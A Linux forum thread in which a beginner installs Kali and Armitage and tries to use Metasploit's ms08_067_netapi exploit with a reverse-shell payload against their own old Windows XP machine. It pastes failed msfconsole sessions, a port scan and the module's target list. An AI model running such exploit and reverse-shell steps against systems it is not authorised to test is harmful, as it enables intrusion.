You're posting in "linux newbies" about a professional system for penetration testing! https://www.kali.org/docs/introducti...se-kali-linux/

I don't know about the complexity of this system. I presumed, I install kali, in this example, a live copy, login and have tools accessible to use, so I can try the xp system connection task. I thought this system was set to go from the get go, what somebody does with it or how, is another question. Considering it isn't a typical system. You can obviously use it just for some web browsing, which is nice. Other than what it, isn't a lite system for general tasks.

So I can't get this armitage working, what else can I do on there to do the task. There is no alternative, it would appear. I've used it more than what I tried in the first time around, where I simply copied the command in a clip, and it didn't work, and then gave up on it. I didn't fully appreciate the setup or task that is actuall required. It was simply a terminal window with one line of code, and I was trying to access the xp system on a wifi, with the firewall off, I think now. But it was all upto date.

I read this link on kali, a USB install persistence, so the hard drive like setup on a USB.

https://www.kali.org/docs/usb/usb-persistence/

I tried installing it on the USB, nothing really happened or changed. Just loaded into the system, and tried to install the armitage, but that didn't work. E error all over again.

I then tried Installer, that then couldn't detect the storage. Unmount error what ever it was now.

So yeah, this may not work. Since the system works as Live. I wonder what else besides Nmap I can use with the security task with it. There are other tools. Is there anything lower than armitage or anything similar but with less function that I can try with the system.

I may only got as far as scanning, and using firefox again. To listen to the Matrix soundtrack.

Have you bump to this link: https://linuxhint.com/install-armitage-kali-linux/

I believe some of the tools you might need to pay, it might work but with limited functionality. Check out link below:
https://www.esecurityplanet.com/prod...0%20per%20year.

I don't know about that.

I did check out a tutorial video on the persistence option. I tried a program called Rufus, I am using a 8GB disk, so that didn't allow for any allocation of 4GB.

I only gathered from the past video, that the reason the armitage didn't install was because the download link was incorrect, default or edit the source.list didn't solve that.

My last option to get this persistence option working could be to allocate some space on the old drive I have which has windows 7 and Linux lite on it, and I have a third section to just load into a installed copy of the kali, and somehow get the armitage installed that way.

Last time I tried, metasploit package i can't use everything since need to get a license.

But of course, maybe there's a way to get it completely free.

You can check out Tenable It's Free to Try Out, most big companies or even sponsored actors use it I guess.

Is this system, not free like the general linux systems available, like Mint, and Lite.

I was under that view it is a free system, whether or not you can use it properly or how to use it, is another question.

I've been able to tinker with the size of the disk, it won't go higher than 3GB.

I did a few partition allocations on it, but no change.

I've downloaded the 3.9GB version which doesn't include some of the tools. The one with most if not all, is 11GB. So I don't have a USB for that.

There is the hard drive one, complete(20GB or) and small install, so 2GB size copy. I doubt it would have firefox in it. I could be wrong.

Attached Thumbnails

 

I tried the everything file which is 11.9GB, it won't transfer to a 32GB disk. It simply states the files too big for the destination.

I tried the full install, there is now the armitage tool available.

How ever, with that working, I can scan and connect to the computer I have, but not much else.

I tried a few exploits/payload stuff in the menu on the left, there is no attack menu as the video tutorial explained. Must be a difference in layout.

THREADS => 24
msf6 auxiliary(scanner/portscan/tcp) > run -j
PORTS => 5671, 50000, 21, 1720, 80, 443, 143, 623, 3306, 110, 5432, 25, 22, , 23, 1521, 50013, 161, 2222, 17185, 135, 8080, 4848, 1433, 5560, 512, 513, 514, 445, 5900, 5901, 5902, 5903, 5904, 5905, 5906, 5907, 5908, 5909, 5038, 111, 139, 49, 515, 7787, 2947, 7144, 9080, 8812, 2525, 2207, 3050, 5405, 1723, 1099, 5555, 921, 10001, 123, 3690, 548, 617, 6112, 6667, 3632, 783, 10050, 38292, 12174, 2967, 5168, 3628, 7777, 6101, 10000, 6504, 41523, 41524, 2000, 1900, 10202, 6503, 6070, 6502, 6050, 2103, 41025, 44334, 2100, 5554, 12203, 26000, 4000, 1000, 8014, 5250, 34443, 8028, 8008, 7510, 9495, 1581, 8000, 18881, 57772, 9090, 9999, 81, 3000, 8300, 8800, 8090, 389, 10203, 5093, 1533, 13500, 705, 4659, 20031, 16102, 6080, 6660, 11000, 19810, 3057, 6905, 1100, 10616, 10628, 5051, 1582, 65535, 105, 22222, 30000, 113, 1755, 407, 1434, 2049, 689, 3128, 20222, 20034, 7580, 7579, 38080, 12401, 910, 912, 11234, 46823, 5061, 5060, 2380, 69, 5800, 62514, 42, 5631, 902, 5985, 5986, 6000, 6001, 6002, 6003, 6004, 6005, 6006, 6007, 47001, 523, 3500, 6379, 8834[*] Auxiliary module running as background job 14.

TCP port 139 and 135 appear to be open. So i couldn't try port 80 or something on one of the gather options, like screenshot of my desktop on my system.


I tried this option in 'gather'

msf6 > use post/windows/gather/enum_logged_on_users
msf6 post(windows/gather/enum_logged_on_users) > set RECENT true
RECENT => true
VERBOSE => false
msf6 post(windows/gather/enum_logged_on_users) > run -j
CURRENT => true
[-] Post failed: Msf::OptionValidateError One or more options failed to validate: SESSION.

At it's most basic, this should simply list the logged on user. I think.

exploit(windows/smb/ms08_067_netapi) > exploit

[-] IP:445 - Exploit failed: You must select a target. [*] Exploit completed, but no session was created.

And using the terminal just to load, I get these errors

msf6 > Info exploit/windows/smb/ms08_067_netapi
[-] Unknown command: Info
msf6 > exploit/windows/smb/ms08_067_netapi
[-] Unknown command: exploit/windows/smb/ms08_067_netapi
This is a module we can load. Do you want to use exploit/windows/smb/ms08_067_netapi? [y/N] y[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > use windows/smb/ms08_067_netapi[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > Set RHOST IP
[-] Unknown command: Set
msf6 exploit(windows/smb/ms08_067_netapi) >

Just using the terminal gives this error. And similar with Armitage, I tried that problem on the kali forums. See if it gets approved, so far few or no responses to topics do.

And questions about tools, definitely a no there.

Clearly the tasks are working, but no connection or session. Screenspy I tried that through armitage, should do a print screen of my system.

But no attack menu is listed, says attack list completed, and that is that, the virtual machine tutorial clip is different in my example.


Exploit targets:
=================

Id Name
-- ----
=> 0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows 2003 SP0 Universal
4 Windows XP SP2 English (AlwaysOn NX)
5 Windows XP SP2 English (NX)
6 Windows XP SP3 English (AlwaysOn NX)
7 Windows XP SP3 English (NX)
8 Windows XP SP2 Arabic (NX)
9 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
10 Windows XP SP2 Chinese - Simplified (NX)
11 Windows XP SP2 Chinese - Traditional (NX)
12 Windows XP SP2 Czech (NX)
13 Windows XP SP2 Danish (NX)
14 Windows XP SP2 German (NX)
15 Windows XP SP2 Greek (NX)
16 Windows XP SP2 Spanish (NX)
17 Windows XP SP2 Finnish (NX)
18 Windows XP SP2 French (NX)
19 Windows XP SP2 Hebrew (NX)
20 Windows XP SP2 Hungarian (NX)
21 Windows XP SP2 Italian (NX)
22 Windows XP SP2 Japanese (NX)
23 Windows XP SP2 Korean (NX)
24 Windows XP SP2 Dutch (NX)
25 Windows XP SP2 Norwegian (NX)
26 Windows XP SP2 Polish (NX)
27 Windows XP SP2 Portuguese - Brazilian (NX)
28 Windows XP SP2 Portuguese (NX)
29 Windows XP SP2 Russian (NX)
30 Windows XP SP2 Swedish (NX)
31 Windows XP SP2 Turkish (NX)
32 Windows XP SP3 Arabic (NX)
33 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
34 Windows XP SP3 Chinese - Simplified (NX)
35 Windows XP SP3 Chinese - Traditional (NX)
36 Windows XP SP3 Czech (NX)
37 Windows XP SP3 Danish (NX)
38 Windows XP SP3 German (NX)
39 Windows XP SP3 Greek (NX)
40 Windows XP SP3 Spanish (NX)
41 Windows XP SP3 Finnish (NX)
42 Windows XP SP3 French (NX)
43 Windows XP SP3 Hebrew (NX)
44 Windows XP SP3 Hungarian (NX)
45 Windows XP SP3 Italian (NX)
46 Windows XP SP3 Japanese (NX)
47 Windows XP SP3 Korean (NX)
48 Windows XP SP3 Dutch (NX)
49 Windows XP SP3 Norwegian (NX)
50 Windows XP SP3 Polish (NX)
51 Windows XP SP3 Portuguese - Brazilian (NX)
52 Windows XP SP3 Portuguese (NX)
53 Windows XP SP3 Russian (NX)
54 Windows XP SP3 Swedish (NX)
55 Windows XP SP3 Turkish (NX)
56 Windows 2003 SP1 English (NO NX)
57 Windows 2003 SP1 English (NX)
58 Windows 2003 SP1 Japanese (NO NX)
59 Windows 2003 SP1 Spanish (NO NX)
60 Windows 2003 SP1 Spanish (NX)
61 Windows 2003 SP1 French (NO NX)
62 Windows 2003 SP1 French (NX)
63 Windows 2003 SP2 English (NO NX)
64 Windows 2003 SP2 English (NX)
65 Windows 2003 SP2 German (NO NX)
66 Windows 2003 SP2 German (NX)
67 Windows 2003 SP2 Portuguese (NX)
68 Windows 2003 SP2 Portuguese - Brazilian (NX)
69 Windows 2003 SP2 Spanish (NO NX)
70 Windows 2003 SP2 Spanish (NX)
71 Windows 2003 SP2 Japanese (NO NX)
72 Windows 2003 SP2 French (NO NX)
73 Windows 2003 SP2 French (NX)
74 Windows 2003 SP2 Chinese - Simplified (NX)
75 Windows 2003 SP2 Czech (NX)
76 Windows 2003 SP2 Dutch (NX)
77 Windows 2003 SP2 Hungarian (NX)
78 Windows 2003 SP2 Italian (NX)
79 Windows 2003 SP2 Russian (NX)
80 Windows 2003 SP2 Swedish (NX)
81 Windows 2003 SP2 Turkish (NX)


msf6 exploit(windows/smb/ms08_067_netapi) > set Target (0)
Target => (0)
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST IP
LHOST => IP
msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[-] IP:445 - Exploit failed: You must select a target.[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms08_067_netapi) >


I even tried changing the RPORT, but the tutorial uses 445.Default stuff.

I got this.

Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host

I tried the attack exploit(windows/smb/ms08_067_netapi using the armitage tool via the metasploit framework.

It doesn't work, most of the exploits don't appear to work on the system. The XP system refused the connection.

I solve the attack menu problem by setting the exploit rank from Great to poor.

Are you updating XP in any way, because you'd surely need to update your exploits; Microsoft isn't going to update XP anymore for you, why would Metasploit* update* those rewritable scripts? Maybe try Perl: http://www.porcupine.org/satan/

The system on the computer I have is a service pack 1 only setup. There are no updates for it. I only recently installed the driver for the Ethernet cable.

Only one website works in Internet Explorer six. So there is no up to date system, if that were the case, service pack 2 would be in an update, if updates were even still working for it.

If your goal's to learn penetration testing to harden a system, I'd* harden it first?

That isn't really the goal. The goal was to try the exploit based off the example I saw in that video clip.

I almost got there with the task, but it has failed. My next task would be try the other XP system, now that can use a wifi adaper to connect to the network, and then I can see if the exploit of connecting to that works, and just try one of the exploits available. As the video showed.